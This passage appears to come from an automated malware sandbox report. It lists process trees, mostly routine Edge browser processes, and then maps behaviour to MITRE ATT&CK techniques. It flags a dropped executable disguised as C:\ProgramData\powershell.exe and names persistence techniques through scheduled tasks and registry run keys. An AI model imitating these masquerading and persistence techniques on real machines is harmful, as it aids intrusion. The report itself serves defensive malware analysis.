  2⤵
  PID:2328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
  2⤵
  PID:4740
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  PID:5060
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:4292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
  2⤵
  PID:1940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
  2⤵
  PID:2628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
  2⤵
  PID:4316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4676 /prefetch:1
  2⤵
  PID:3500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4920 /prefetch:8
  2⤵
  PID:4500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6064 /prefetch:8
  2⤵
  PID:4352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
  2⤵
  PID:1048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:3064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
  2⤵
  PID:2112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,16557182216693624923,4505842767839433213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
  2⤵
  PID:6092

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2212

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4652

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x384 0x2c4
1⤵
PID:2096

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2112

C:\ProgramData\powershell.exe
C:\ProgramData\powershell.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5208

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1624

C:\ProgramData\powershell.exe
C:\ProgramData\powershell.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5284

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3912055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery